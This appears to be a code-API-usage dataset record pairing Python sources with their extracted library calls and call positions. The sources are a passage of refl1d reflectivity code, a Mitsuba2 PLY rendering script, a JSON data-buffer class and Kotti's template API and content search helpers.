# they are shifted profiles (by I'd guess 3*roughness[0]?)
from refl1d.profile import build_profile
w = thickness
sld = sld
# Means, the first layer is the substrate and we only have to include
# the roughness effect. To do so, select a proper thickness (> 0) such
# that the convolution with the gaussian kernel is sufficiently approximated
if w[0] == 0:
# refl1d uses 3 sigma usually
# why 3?
# that's 3 sigma and the gaussian smoothing is nearly zero out there
# thus the 'substrate' layer is big enough to be approximated by this
# ofc bigger sigma values (>= 5) are better, but they need more
# computation
w[0] = 3 * roughness[0]
z = np.linspace(0, sum(w) + roughness[-1] * 5, int(precision * sum(w)) + 1)
offsets = np.cumsum(w)
rho = build_profile(z, offsets, roughness, sld)
return cls(z, rho)
def thickness(self):
return max(self._z) - min(self._z)
def plot_profile(self, offset=0, reverse=False):
import pylab
rho = self._rho
if reverse:
rho = list(reversed(self._rho))
pylab.plot(self._z + offset, rho)
def as_matrix(self, q):
# len(dz) = len(self._z) - 1
dz = np.diff(self._z)
m = len(dz) * [None]
for idx in range(0, len(dz)):
m[idx] = reflection_matrix(q, self._rho[idx], dz[idx], as_matrix=True)
# There is still some potential here
# Whats happening here:
# m1 * m2 * m3 * m4 * m5 ... in a sequentially manner
# maybe it's faster if you do something like
# (m1 * m2) * (m3 * m4) * ...
# and redo the grouping in the next step. this should be then O(log n)
# compared to the seq. multiplication which is O(n)....
# BUT: this has to be done in C code, not in a python implementation :/
m = reduce(np.dot, m)
return m[0][0], m[0][1], m[1][0], m[1][1]
class Reflectivity(object):
def __init__(self, sld_profile, fronting, backing):
assert isinstance(sld_profile, SLDProfile)
self._sld = sld_profile
self._f, self._b = fronting, backing
# The input should be of the magnitude 1e-6 ... 1e-5
if any(abs(np.array([fronting, backing])) >= 1e-1):
raise RuntimeWarning("Given fronting/backing SLD values are too high")
def reflection(self, q_space, as_function=True):
r = np.ones(len(q_space), dtype=complex)
for idx, q in enumerate(q_space):
if abs(q) < 1e-10:
continue
# See [Majkrzak2003] equation (17)
f, h = refr_idx(q, self._f), refr_idx(q, self._b)
A, B, C, D = self._sld.as_matrix(q)
r[idx] = (f * h * B + C + 1j * (f * D - h * A)) / \
(f * h * B - C + 1j * (f * D + h * A))
if as_function:
return self.to_function(r, q_space, square=False)
else:
return r
@staticmethod
def to_function(r, q_space, square=False):
real = interpolate(q_space, r.real)
imag = interpolate(q_space, r.imag)
if square:
return lambda q: real(q)**2 + imag(q)**2
else:
return lambda q: real(q) + 1j * imag(q)
def reflectivity(self, q_space):
r = self.reflection(q_space)
return lambda q: abs(r(q)) ** 2
def plot(self, q_space):
import pylab
R = self.reflectivity(q_space)
pylab.plot(q_space, R(q_space))
return R
|
[
"cmath.sqrt",
"math.ceil",
"refl1d.profile.Microslabs",
"refl1d.profile.build_profile",
"refl1d.probe.NeutronProbe",
"numpy.cumsum",
"numpy.diff",
"numpy.array",
"numpy.sin",
"numpy.cos",
"functools.reduce",
"scipy.interpolate.interp1d",
"pylab.plot",
"numpy.linalg.multi_dot"
] |
[((399, 448), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'fx'], {'bounds_error': '(False)', 'fill_value': '(0)'}), '(x, fx, bounds_error=False, fill_value=0)\n', (407, 448), False, 'from scipy.interpolate import interp1d\n'), ((918, 956), 'cmath.sqrt', 'cmath.sqrt', (['(1 - 16 * pi * sld / q ** 2)'], {}), '(1 - 16 * pi * sld / q ** 2)\n', (928, 956), False, 'import cmath\n'), ((1526, 1536), 'numpy.cos', 'cos', (['theta'], {}), '(theta)\n', (1529, 1536), False, 'from numpy import sin, cos\n'), ((1575, 1585), 'numpy.cos', 'cos', (['theta'], {}), '(theta)\n', (1578, 1585), False, 'from numpy import sin, cos\n'), ((1620, 1646), 'numpy.array', 'np.array', (['[[a, b], [c, d]]'], {}), '([[a, b], [c, d]])\n', (1628, 1646), True, 'import numpy as np\n'), ((2929, 2951), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', (['m'], {}), '(m)\n', (2948, 2951), True, 'import numpy as np\n'), ((4032, 4049), 'refl1d.profile.Microslabs', 'Microslabs', (['(1)', 'dz'], {}), '(1, dz)\n', (4042, 4049), False, 'from refl1d.profile import Microslabs\n'), ((5834, 5846), 'numpy.cumsum', 'np.cumsum', (['w'], {}), '(w)\n', (5843, 5846), True, 'import numpy as np\n'), ((5861, 5902), 'refl1d.profile.build_profile', 'build_profile', (['z', 'offsets', 'roughness', 'sld'], {}), '(z, offsets, roughness, sld)\n', (5874, 5902), False, 'from refl1d.profile import build_profile\n'), ((6174, 6207), 'pylab.plot', 'pylab.plot', (['(self._z + offset)', 'rho'], {}), '(self._z + offset, rho)\n', (6184, 6207), False, 'import pylab\n'), ((6288, 6304), 'numpy.diff', 'np.diff', (['self._z'], {}), '(self._z)\n', (6295, 6304), True, 'import numpy as np\n'), ((6922, 6939), 'functools.reduce', 'reduce', (['np.dot', 'm'], {}), '(np.dot, m)\n', (6928, 6939), False, 'from functools import reduce\n'), ((1546, 1556), 'numpy.sin', 'sin', (['theta'], {}), '(theta)\n', (1549, 1556), False, 'from numpy import sin, cos\n'), ((1563, 1573), 'numpy.sin', 'sin', (['theta'], {}), '(theta)\n', (1566, 1573), False, 'from numpy import sin, cos\n'), ((2828, 2854), 'numpy.array', 'np.array', (['[[a, b], [c, d]]'], {}), '([[a, b], [c, d]])\n', (2836, 2854), True, 'import numpy as np\n'), ((3266, 3306), 'math.ceil', 'ceil', (['((support[1] - support[0]) * 1 / dx)'], {}), '((support[1] - support[0]) * 1 / dx)\n', (3270, 3306), False, 'from math import pi, ceil\n'), ((3984, 4014), 'refl1d.probe.NeutronProbe', 'NeutronProbe', ([], {'T': '[1.0]', 'L': '[1.0]'}), '(T=[1.0], L=[1.0])\n', (3996, 4014), False, 'from refl1d.probe import NeutronProbe\n'), ((7286, 7315), 'numpy.array', 'np.array', (['[fronting, backing]'], {}), '([fronting, backing])\n', (7294, 7315), True, 'import numpy as np\n')]
|
import os
import mitsuba
import numpy as np
import argparse
import utils
mitsuba.set_variant('scalar_spectral')
from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct
from mitsuba.python.xml import WriteXML
from enoki.scalar import *
import open3d as o3d
from plyfile import PlyData, PlyElement
from render import gravity_aligned_mobb
def cvt_rgba2float(filename, tmp_out_file):
plydata = PlyData.read(filename)
x = np.asarray(plydata['vertex']['x'])
y = np.asarray(plydata['vertex']['y'])
z = np.asarray(plydata['vertex']['z'])
red = plydata['vertex']['red'].astype('float32') / 255.
green = plydata['vertex']['green'].astype('float32') / 255.
blue = plydata['vertex']['blue'].astype('float32') / 255.
vertices = np.vstack((x, y, z, red, green, blue)).transpose()
ply_vertices = [tuple(x) for x in vertices.tolist()]
ply_vertices = np.array(ply_vertices, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'),
('red', 'f4'), ('green', 'f4'), ('blue', 'f4')])
el = PlyElement.describe(ply_vertices, 'vertex')
plydata.elements = [el, plydata['face']]
plydata.write(os.path.join(os.path.dirname(filename), tmp_out_file))
return vertices
def mts_render(filename, vertices, output):
data = {"type": "scene", "./": {"type": "path"}}
shape_dict = {
"type": "ply", 'filename': filename,
"mybsdf": {
"type": "diffuse",
"reflectance": {
"type": "mesh_attribute",
"name": "vertex_color"
# "type": "rgb",
# "value": [231. / 255, 181. / 255, 75. / 255],
}
}
}
emitter_dict = {"type": "constant"}
sensor_dict = {
"type": "perspective",
'fov': 60,
"myfilm": {
"type": "hdrfilm",
"rfilter": {"type": "gaussian"},
"width": 1920,
"height": 1440,
"pixel_format": "rgba"
},
"mysampler": {
"type": "independent",
"sample_count": 64,
}
}
obb_center, obb_size, trans_inv = gravity_aligned_mobb(vertices[:, 0:3], np.array((0.0,1.0,0.0)))
rot = trans_inv
inv_rot = np.linalg.inv(rot)
cam_target = obb_center
cam_translate = Transform4f.translate(cam_target)
cam_un_translate = Transform4f.translate(-cam_target)
world_up = Vector3f(0, 0, -1)
cam_offvec = Vector3f(0, 0, 0)
margin = 1.0
radius = np.linalg.norm(obb_size) / 2.0 + margin
cam_offset = cam_offvec + world_up
cam_offset = rot.dot(cam_offset)
cam_offset = 2 * radius * cam_offset / np.linalg.norm(cam_offset)
cam_origin = cam_target + cam_offset
cam_up = rot.dot(Vector3f(0, 1, 0))
sensor_dict['to_world'] = ScalarTransform4f.look_at(origin=cam_origin, target=cam_target, up=cam_up)
data['myshape'] = shape_dict
data['mysensor'] = sensor_dict
data['myemitter'] = emitter_dict
scene = xml.load_dict(data)
sensor = scene.sensors()[0]
scene.integrator().render(scene, sensor)
film = sensor.film()
film.set_destination_file(os.path.splitext(output)[0]+'.exr')
film.develop()
img = film.bitmap(raw=True).convert(Bitmap.PixelFormat.RGB, Struct.Type.UInt8, srgb_gamma=True)
img.write(output)
# out = WriteXML('./test.xml')
# out.write_dict(data)
def configure(args):
if not utils.file_exist(args.input, '.ply'):
utils.print_e(f'Input file {args.input} not exists')
return False
dir_path = os.path.dirname(args.output)
if not utils.folder_exist(dir_path):
utils.print_e(f'Cannot create file in folder {dir_path}')
return False
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Mitsuba2 Rendering!')
parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
help='Input mesh ply file')
parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
help='Input mesh ply file')
parser.add_argument('-o', '--output', dest='output', type=str, action='store', required=True,
help='Output rendered png file')
args = parser.parse_args()
if not configure(args):
exit(0)
filename = os.path.realpath(args.input)
tmp_out_file = os.path.splitext(filename)[0]+'_temp_rgba_float.ply'
vertices = cvt_rgba2float(filename, tmp_out_file)
mts_render(tmp_out_file, vertices, args.output)
|
[
"plyfile.PlyElement.describe",
"mitsuba.core.xml.load_dict",
"mitsuba.core.Transform4f.translate",
"argparse.ArgumentParser",
"utils.file_exist",
"numpy.asarray",
"mitsuba.set_variant",
"mitsuba.core.ScalarTransform4f.look_at",
"os.path.dirname",
"os.path.realpath",
"utils.print_e",
"numpy.array",
"numpy.linalg.inv",
"numpy.linalg.norm",
"os.path.splitext",
"numpy.vstack",
"plyfile.PlyData.read",
"utils.folder_exist"
] |
[((74, 112), 'mitsuba.set_variant', 'mitsuba.set_variant', (['"""scalar_spectral"""'], {}), "('scalar_spectral')\n", (93, 112), False, 'import mitsuba\n'), ((426, 448), 'plyfile.PlyData.read', 'PlyData.read', (['filename'], {}), '(filename)\n', (438, 448), False, 'from plyfile import PlyData, PlyElement\n'), ((458, 492), 'numpy.asarray', 'np.asarray', (["plydata['vertex']['x']"], {}), "(plydata['vertex']['x'])\n", (468, 492), True, 'import numpy as np\n'), ((501, 535), 'numpy.asarray', 'np.asarray', (["plydata['vertex']['y']"], {}), "(plydata['vertex']['y'])\n", (511, 535), True, 'import numpy as np\n'), ((544, 578), 'numpy.asarray', 'np.asarray', (["plydata['vertex']['z']"], {}), "(plydata['vertex']['z'])\n", (554, 578), True, 'import numpy as np\n'), ((907, 1028), 'numpy.array', 'np.array', (['ply_vertices'], {'dtype': "[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'f4'), ('green', 'f4'), (\n 'blue', 'f4')]"}), "(ply_vertices, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red',\n 'f4'), ('green', 'f4'), ('blue', 'f4')])\n", (915, 1028), True, 'import numpy as np\n'), ((1070, 1113), 'plyfile.PlyElement.describe', 'PlyElement.describe', (['ply_vertices', '"""vertex"""'], {}), "(ply_vertices, 'vertex')\n", (1089, 1113), False, 'from plyfile import PlyData, PlyElement\n'), ((2254, 2272), 'numpy.linalg.inv', 'np.linalg.inv', (['rot'], {}), '(rot)\n', (2267, 2272), True, 'import numpy as np\n'), ((2321, 2354), 'mitsuba.core.Transform4f.translate', 'Transform4f.translate', (['cam_target'], {}), '(cam_target)\n', (2342, 2354), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((2378, 2412), 'mitsuba.core.Transform4f.translate', 'Transform4f.translate', (['(-cam_target)'], {}), '(-cam_target)\n', (2399, 2412), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((2811, 2885), 'mitsuba.core.ScalarTransform4f.look_at', 'ScalarTransform4f.look_at', ([], {'origin': 'cam_origin', 'target': 'cam_target', 'up': 'cam_up'}), '(origin=cam_origin, target=cam_target, up=cam_up)\n', (2836, 2885), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((3005, 3024), 'mitsuba.core.xml.load_dict', 'xml.load_dict', (['data'], {}), '(data)\n', (3018, 3024), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((3567, 3595), 'os.path.dirname', 'os.path.dirname', (['args.output'], {}), '(args.output)\n', (3582, 3595), False, 'import os\n'), ((3782, 3840), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Mitsuba2 Rendering!"""'}), "(description='Mitsuba2 Rendering!')\n", (3805, 3840), False, 'import argparse\n'), ((4385, 4413), 'os.path.realpath', 'os.path.realpath', (['args.input'], {}), '(args.input)\n', (4401, 4413), False, 'import os\n'), ((2194, 2219), 'numpy.array', 'np.array', (['(0.0, 1.0, 0.0)'], {}), '((0.0, 1.0, 0.0))\n', (2202, 2219), True, 'import numpy as np\n'), ((2672, 2698), 'numpy.linalg.norm', 'np.linalg.norm', (['cam_offset'], {}), '(cam_offset)\n', (2686, 2698), True, 'import numpy as np\n'), ((3431, 3467), 'utils.file_exist', 'utils.file_exist', (['args.input', '""".ply"""'], {}), "(args.input, '.ply')\n", (3447, 3467), False, 'import utils\n'), ((3477, 3529), 'utils.print_e', 'utils.print_e', (['f"""Input file {args.input} not exists"""'], {}), "(f'Input file {args.input} not exists')\n", (3490, 3529), False, 'import utils\n'), ((3607, 3635), 'utils.folder_exist', 'utils.folder_exist', (['dir_path'], {}), '(dir_path)\n', (3625, 3635), False, 'import utils\n'), ((3645, 3702), 'utils.print_e', 'utils.print_e', (['f"""Cannot create file in folder {dir_path}"""'], {}), "(f'Cannot create file in folder {dir_path}')\n", (3658, 3702), False, 'import utils\n'), ((780, 818), 'numpy.vstack', 'np.vstack', (['(x, y, z, red, green, blue)'], {}), '((x, y, z, red, green, blue))\n', (789, 818), True, 'import numpy as np\n'), ((1190, 1215), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (1205, 1215), False, 'import os\n'), ((2513, 2537), 'numpy.linalg.norm', 'np.linalg.norm', (['obb_size'], {}), '(obb_size)\n', (2527, 2537), True, 'import numpy as np\n'), ((4433, 4459), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (4449, 4459), False, 'import os\n'), ((3157, 3181), 'os.path.splitext', 'os.path.splitext', (['output'], {}), '(output)\n', (3173, 3181), False, 'import os\n')]
|
import os
import json
from typing import Union
class DataBasic:
path = ""
def first_startup(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
print(f"created {self.path} directory")
class Data(DataBasic):
path = "./data"
def __init__(self):
self._buffer = {}
self.first_startup()
@property
def buffer(self):
return self._buffer
@staticmethod
def check_path(path: str):
if not os.path.exists(path):
os.mkdir(path)
print(f"Created {path}")
@staticmethod
def check_file(file: str, path: str):
if not os.path.exists(f"{path}/{file}"):
f = open(f"{path}/{file}", "w")
if file.endswith(".json"):
json.dump({}, f)
f.close()
def _load_file(self, *, file: str, path: str = ""):
path = f"{self.path}/{path}"
self.check_path(path)
self.check_file(file, path)
return open(f"{path}/{file}")
def get(self, *, file, path: str = "", buffer: bool = True) -> str:
if file not in self._buffer.keys():
f = self._load_file(file=file, path=path)
content = f.read()
if buffer:
self._buffer[file] = content
return content
else:
return self._buffer[file]
def get_json(self, *, file, path: str = "", buffer: bool = True) -> Union[list, dict]:
if file not in self._buffer.keys():
f = self._load_file(file=file + ".json", path=path)
content = json.load(f)
if buffer:
self._buffer[file] = content
return content
else:
return self._buffer[file]
def _save_file(self, *, data, file: str, path: str = ""):
path = f"{self.path}/{path}"
self.check_path(path)
f = open(f"{path}/{file}", "w")
if file.endswith(".json"):
json.dump(data, f)
else:
f.write(data)
f.close()
def set(self, *, file, path: str = "", data, buffer: bool = True):
if buffer:
self._buffer[file] = data
self._save_file(data=data, file=file, path=path)
def set_json(self, *, file, path: str = "", data, buffer: bool = True):
if buffer:
self._buffer[file] = data
self._save_file(data=data, file=file + ".json", path=path)
if __name__ == "__main__":
d = Data()
d.get_json(file="test", path="testing")
|
[
"json.dump",
"os.mkdir",
"json.load",
"os.path.exists"
] |
[((125, 150), 'os.path.exists', 'os.path.exists', (['self.path'], {}), '(self.path)\n', (139, 150), False, 'import os\n'), ((164, 183), 'os.mkdir', 'os.mkdir', (['self.path'], {}), '(self.path)\n', (172, 183), False, 'import os\n'), ((492, 512), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (506, 512), False, 'import os\n'), ((526, 540), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (534, 540), False, 'import os\n'), ((654, 686), 'os.path.exists', 'os.path.exists', (['f"""{path}/{file}"""'], {}), "(f'{path}/{file}')\n", (668, 686), False, 'import os\n'), ((1595, 1607), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1604, 1607), False, 'import json\n'), ((1972, 1990), 'json.dump', 'json.dump', (['data', 'f'], {}), '(data, f)\n', (1981, 1990), False, 'import json\n'), ((787, 803), 'json.dump', 'json.dump', (['{}', 'f'], {}), '({}, f)\n', (796, 803), False, 'import json\n')]
|
import hashlib
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlencode
from babel.dates import format_date
from babel.dates import format_datetime
from babel.dates import format_time
from babel.numbers import format_currency
from pyramid.decorator import reify
from pyramid.i18n import get_locale_name
from pyramid.interfaces import ILocation
from pyramid.location import inside
from pyramid.location import lineage
from pyramid.renderers import get_renderer
from pyramid.renderers import render
from pyramid.settings import asbool
from sqlalchemy import and_
from sqlalchemy import not_
from sqlalchemy import or_
from kotti import DBSession
from kotti import get_settings
from kotti.events import objectevent_listeners
from kotti.interfaces import INavigationRoot
from kotti.resources import Content
from kotti.resources import Document
from kotti.resources import Node
from kotti.resources import Tag
from kotti.resources import TagsToContents
from kotti.resources import get_root
from kotti.sanitizers import sanitize
from kotti.security import view_permitted
from kotti.util import TemplateStructure
from kotti.util import render_view
from kotti.views.site_setup import CONTROL_PANEL_LINKS
from kotti.views.slots import slot_events
class SettingHasValuePredicate:
def __init__(self, val, config):
self.name, self.value = val
if not isinstance(self.value, bool):
raise ValueError("Only boolean values supported")
def text(self):
return f"if_setting_has_value = {self.name} == {self.value}"
phash = text
def __call__(self, context, request):
return asbool(request.registry.settings[self.name]) == self.value
class RootOnlyPredicate:
def __init__(self, val, config):
self.val = val
def text(self):
return f"root_only = {self.val}"
phash = text
def __call__(self, context, request):
return (context is request.root) == self.val
def template_api(context, request, **kwargs):
return get_settings()["kotti.templates.api"][0](context, request, **kwargs)
def add_renderer_globals(event):
if event.get("renderer_name") != "json":
request = event["request"]
api = getattr(request, "template_api", None)
if api is None and request is not None:
api = template_api(event["context"], event["request"])
event["api"] = api
class Slots:
def __init__(self, context, request):
self.context = context
self.request = request
def __getattr__(self, key):
for event_type in slot_events:
if event_type.name == key:
break
else:
raise AttributeError(key)
value = []
event = event_type(self.context, self.request)
for snippet in objectevent_listeners(event):
if snippet is not None:
if isinstance(snippet, list):
value.extend(snippet)
else:
value.append(snippet)
setattr(self, key, value)
return value
class TemplateAPI:
"""This implements the ``api`` object that's passed to all templates.
Use dict-access as a shortcut to retrieve template macros from templates.
"""
# Instead of overriding these, consider using the
# ``kotti.overrides`` variable.
BARE_MASTER = "kotti:templates/master-bare.pt"
VIEW_MASTER = "kotti:templates/view/master.pt"
EDIT_MASTER = "kotti:templates/edit/master.pt"
SITE_SETUP_MASTER = "kotti:templates/site-setup/master.pt"
body_css_class = ""
def __init__(self, context, request, bare=None, **kwargs):
self.context, self.request = context, request
if getattr(request, "template_api", None) is None:
request.template_api = self
self.S = get_settings()
if request.is_xhr and bare is None:
bare = True # use bare template that renders just the content area
self.bare = bare
self.slots = Slots(context, request)
self.__dict__.update(kwargs)
@staticmethod
def is_location(context):
"""Does `context` implement :class:`pyramid.interfaces.ILocation`?
:param context: The context.
:type context: kotti.interfaces.INode
:rtype: bool
:returns: True if Is the context object implements
:class:`pyramid.interfaces.ILocation`.
"""
return ILocation.providedBy(context)
@reify
def edit_needed(self):
if "kotti.fanstatic.edit_needed" in self.S:
return [r.need() for r in self.S["kotti.fanstatic.edit_needed"]]
@reify
def view_needed(self):
if "kotti.fanstatic.view_needed" in self.S:
return [r.need() for r in self.S["kotti.fanstatic.view_needed"]]
def macro(self, asset_spec, macro_name="main"):
if self.bare and asset_spec in (
self.VIEW_MASTER,
self.EDIT_MASTER,
self.SITE_SETUP_MASTER,
):
asset_spec = self.BARE_MASTER
return get_renderer(asset_spec).implementation().macros[macro_name]
@reify
def site_title(self):
""" The site title.
:result: Value of the ``kotti.site_title`` setting (if specified) or
the root item's ``title`` attribute.
:rtype: str
"""
value = get_settings().get("kotti.site_title")
if not value:
value = self.root.title
return value
@reify
def page_title(self):
"""
Title for the current page as used in the ``<head>`` section of the
default ``master.pt`` template.
:result: '[Human readable view title ]``context.title`` -
:meth:`~TemplateAPI.site_title`''
:rtype: str
"""
view_title = self.request.view_name.replace("_", " ").title()
if view_title:
view_title += " "
view_title += self.context.title
return f"{view_title} - {self.site_title}"
def url(self, context=None, *elements, **kwargs):
"""
URL construction helper. Just a convenience wrapper for
:func:`pyramid.request.resource_url` with the same signature. If
``context`` is ``None`` the current context is passed to
``resource_url``.
"""
if context is None:
context = self.context
if not ILocation.providedBy(context):
return self.request.url
return self.request.resource_url(context, *elements, **kwargs)
@reify
def root(self):
"""
The site root.
:result: The root object of the site.
:rtype: :class:`kotti.resources.Node`
"""
if ILocation.providedBy(self.context):
return self.lineage[-1]
else:
return get_root()
@reify
def navigation_root(self):
"""
The root node for the navigation.
:result: Nearest node in the :meth:`lineage` that provides
:class:`kotti.interfaces.INavigationRoot` or :meth:`root` if
no node provides that interface.
:rtype: :class:`kotti.resources.Node`
"""
for o in self.lineage:
if INavigationRoot.providedBy(o):
return o
return self.root
@reify
def lineage(self):
"""
Lineage from current context to the root node.
:result: List of nodes.
:rtype: list of :class:`kotti.resources.Node`
"""
return list(lineage(self.context))
@reify
def breadcrumbs(self):
"""
List of nodes from the :meth:`navigation_root` to the context.
:result: List of nodes.
:rtype: list of :class:`kotti.resources.Node`
"""
breadcrumbs = self.lineage
if self.root != self.navigation_root:
index = breadcrumbs.index(self.navigation_root)
breadcrumbs = breadcrumbs[: index + 1]
return reversed(breadcrumbs)
def has_permission(self, permission, context=None):
""" Convenience wrapper for :func:`pyramid.security.has_permission`
with the same signature. If ``context`` is ``None`` the current
context is passed to ``has_permission``."""
if context is None:
context = self.context
return self.request.has_permission(permission, context)
def render_view(self, name="", context=None, request=None, secure=True, bare=True):
if context is None:
context = self.context
if request is None:
request = self.request
before = self.bare
try:
self.bare = bare
html = render_view(context, request, name, secure)
finally:
self.bare = before
return TemplateStructure(html)
def render_template(self, renderer, **kwargs):
return TemplateStructure(render(renderer, kwargs, self.request))
def list_children(self, context=None, permission="view"):
if context is None:
context = self.context
if isinstance(context, Node):
if permission is None:
return context.children
return context.children_with_permission(self.request, permission)
return [
c
for c in getattr(context, "values", lambda: [])()
if (not permission or self.request.has_permission(permission, c))
]
inside = staticmethod(inside)
def avatar_url(self, user=None, size="14", default_image="identicon"):
if user is None:
user = self.request.user
email = user.email
if not email:
email = user.name
h = hashlib.md5(email.encode("utf8")).hexdigest()
query = {"default": default_image, "size": str(size)}
url = "https://secure.gravatar.com/avatar/{}?{}".format(h, urlencode(query))
return url
@reify
def locale_name(self):
return get_locale_name(self.request)
def format_date(self, d, fmt=None):
if fmt is None:
fmt = self.S["kotti.date_format"]
return format_date(d, format=fmt, locale=self.locale_name)
def format_datetime(self, dt, fmt=None):
if fmt is None:
fmt = self.S["kotti.datetime_format"]
if not isinstance(dt, datetime):
dt = datetime.fromtimestamp(dt)
return format_datetime(dt, format=fmt, locale=self.locale_name)
def format_time(self, t, fmt=None):
if fmt is None:
fmt = self.S["kotti.time_format"]
return format_time(t, format=fmt, locale=self.locale_name)
def format_currency(self, n, currency, fmt=None):
return format_currency(n, currency, format=fmt, locale=self.locale_name)
@staticmethod
def get_type(name):
for class_ in get_settings()["kotti.available_types"]:
if class_.type_info.name == name:
return class_
def find_edit_view(self, item):
view_name = self.request.view_name
if not view_permitted(item, self.request, view_name):
view_name = "edit"
if not view_permitted(item, self.request, view_name):
view_name = ""
return view_name
@reify
def edit_links(self):
if not hasattr(self.context, "type_info"):
return []
return [
link
for link in self.context.type_info.edit_links
if link.visible(self.context, self.request)
]
@reify
def site_setup_links(self):
return [link for link in CONTROL_PANEL_LINKS
if link.visible(self.root, self.request)]
@staticmethod
def sanitize(html, sanitizer="default"):
""" Convenience wrapper for :func:`kotti.sanitizers.sanitize`.
:param html: HTML to be sanitized
:type html: str
:param sanitizer: name of the sanitizer to use.
:type sanitizer: str
:result: sanitized HTML
:rtype: str
"""
return sanitize(html, sanitizer)
class NodesTree:
def __init__(self, node, request, item_mapping, item_to_children, permission):
self._node = node
self._request = request
self._item_mapping = item_mapping
self._item_to_children = item_to_children
self._permission = permission
@property
def __parent__(self):
if self.parent_id:
return self._item_mapping[self.parent_id]
@property
def children(self):
return [
NodesTree(
child,
self._request,
self._item_mapping,
self._item_to_children,
self._permission,
)
for child in self._item_to_children[self.id]
if self._request.has_permission(self._permission, child)
]
def _flatten(self, item):
# noinspection PyProtectedMember
yield item._node
for ch in item.children:
yield from self._flatten(ch)
def tolist(self):
return list(self._flatten(self))
def __getattr__(self, key):
return getattr(self._node, key)
def nodes_tree(request, context=None, permission="view"):
item_mapping = {}
item_to_children = defaultdict(lambda: [])
for node in DBSession.query(Content).with_polymorphic(Content):
item_mapping[node.id] = node
if request.has_permission(permission, node):
item_to_children[node.parent_id].append(node)
for children in item_to_children.values():
children.sort(key=lambda ch: ch.position)
if context is None:
node = item_to_children[None][0]
else:
node = context
return NodesTree(node, request, item_mapping, item_to_children, permission)
def search_content(search_term, request=None):
return get_settings()["kotti.search_content"][0](search_term, request)
def default_search_content(search_term, request=None):
# noinspection PyUnresolvedReferences
searchstring = f"%{search_term}%"
# generic_filter can be applied to all Node (and subclassed) objects
generic_filter = or_(
Content.name.like(searchstring),
Content.title.like(searchstring),
Content.description.like(searchstring),
)
results = (
DBSession.query(Content)
.filter(generic_filter)
.order_by(Content.title.asc())
.all()
)
# specific result contain objects matching additional criteria
# but must not match the generic criteria (because these objects
# are already in the generic_results)
document_results = DBSession.query(Document).filter(
and_(Document.body.like(searchstring), not_(generic_filter))
)
for results_set in [content_with_tags([searchstring]), document_results.all()]:
[results.append(c) for c in results_set if c not in results]
result_dicts = []
for result in results:
if request.has_permission("view", result):
result_dicts.append(
dict(
name=result.name,
title=result.title,
description=result.description,
path=request.resource_path(result),
)
)
return result_dicts
def content_with_tags(tag_terms):
return (
DBSession.query(Content)
.join(TagsToContents)
.join(Tag)
.filter(or_(*[Tag.title.like(tag_term) for tag_term in tag_terms]))
.all()
)
def search_content_for_tags(tags, request=None):
result_dicts = []
for result in content_with_tags(tags):
if request.has_permission("view", result):
result_dicts.append(
dict(
name=result.name,
title=result.title,
description=result.description,
path=request.resource_path(result),
)
)
return result_dicts
def includeme(config):
""" Pyramid includeme hook.
:param config: app config
:type config: :class:`pyramid.config.Configurator`
"""
config.add_view_predicate("root_only", RootOnlyPredicate)
config.add_view_predicate("if_setting_has_value", SettingHasValuePredicate)
|
[
"pyramid.interfaces.ILocation.providedBy",
"kotti.get_settings",
"collections.defaultdict",
"pyramid.settings.asbool",
"kotti.util.TemplateStructure",
"kotti.security.view_permitted",
"kotti.resources.get_root",
"kotti.resources.Content.name.like",
"kotti.interfaces.INavigationRoot.providedBy",
"kotti.resources.Tag.title.like",
"kotti.DBSession.query",
"babel.dates.format_time",
"sqlalchemy.not_",
"pyramid.renderers.get_renderer",
"babel.numbers.format_currency",
"urllib.parse.urlencode",
"kotti.resources.Content.description.like",
"kotti.resources.Content.title.like",
"kotti.util.render_view",
"kotti.resources.Document.body.like",
"datetime.datetime.fromtimestamp",
"pyramid.renderers.render",
"babel.dates.format_datetime",
"kotti.events.objectevent_listeners",
"kotti.resources.Content.title.asc",
"babel.dates.format_date",
"pyramid.i18n.get_locale_name",
"kotti.sanitizers.sanitize",
"pyramid.location.lineage"
] |
[((13325, 13349), 'collections.defaultdict', 'defaultdict', (['(lambda : [])'], {}), '(lambda : [])\n', (13336, 13349), False, 'from collections import defaultdict\n'), ((2825, 2853), 'kotti.events.objectevent_listeners', 'objectevent_listeners', (['event'], {}), '(event)\n', (2846, 2853), False, 'from kotti.events import objectevent_listeners\n'), ((3848, 3862), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (3860, 3862), False, 'from kotti import get_settings\n'), ((4466, 4495), 'pyramid.interfaces.ILocation.providedBy', 'ILocation.providedBy', (['context'], {}), '(context)\n', (4486, 4495), False, 'from pyramid.interfaces import ILocation\n'), ((6756, 6790), 'pyramid.interfaces.ILocation.providedBy', 'ILocation.providedBy', (['self.context'], {}), '(self.context)\n', (6776, 6790), False, 'from pyramid.interfaces import ILocation\n'), ((8840, 8863), 'kotti.util.TemplateStructure', 'TemplateStructure', (['html'], {}), '(html)\n', (8857, 8863), False, 'from kotti.util import TemplateStructure\n'), ((10020, 10049), 'pyramid.i18n.get_locale_name', 'get_locale_name', (['self.request'], {}), '(self.request)\n', (10035, 10049), False, 'from pyramid.i18n import 